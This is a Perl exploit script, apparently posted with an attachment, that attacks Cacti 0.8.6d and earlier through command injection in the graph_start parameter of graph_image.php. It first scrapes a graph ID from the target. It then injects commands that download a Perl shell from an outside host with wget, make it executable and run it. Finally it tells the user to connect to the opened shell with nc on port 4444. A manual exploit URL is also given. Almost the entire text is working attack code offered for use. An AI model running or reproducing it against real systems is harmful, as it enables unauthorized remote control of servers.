#!/usr/bin/perl # # Remote Command Execution Exploit for Cacti <= 0.8.6d # # This exploit open a remote shell on the targets that uses Cacti # TARGET HOST MUST BE A GNU/LINUX SERVER, if not: # manual exploiting --> http://www.example.com/cacti/graph_image.php?local_graph_id=[valid_value]&gr aph_start=%0a[command]%0a # Patch: download the last version http://www.cacti.net/download_cacti.php # Discovered and Coded by Alberto Trivero use LWP::Simple; print "\n\t===============================\n"; print "\t= Exploit for Cacti <= 0.8.6d =\n"; print "\t= by Alberto Trivero =\n"; print "\t===============================\n\n"; if(@ARGV<2 or !($ARGV[1]=~m/\//)) { print "Usage:\nperl $0 [target] [path]\n\nExamples:\nperl $0 www.example.com /cacti/\n"; exit(0); } $page=get("http://".$ARGV[0].$ARGV[1]."graph_view.php?action=list") || die "[-] Unable to retrieve: $!"; print "[+] Connected to: $ARGV[0]\n"; $page=~m/local_graph_id=(.*?)&/ || die "[-] Unable to retrieve a value for local_graph_id"; print "[~] Sending exploiting request, wait for some seconds/minutes...\n"; get("http://".$ARGV[0].$ARGV[1]."graph_image.php?local_graph_id=$1&graph_sta rt=%0acd /tmp;wget http://albythebest.altervista.org/shell.pl;chmod 777 shell.pl;perl shell.pl%0a"); print "[+] Exploiting request done!\n"; print "[*] Now try on your box: nc -v $ARGV[0] 4444\n";
Attachment:
cacti.pl
Description: Binary data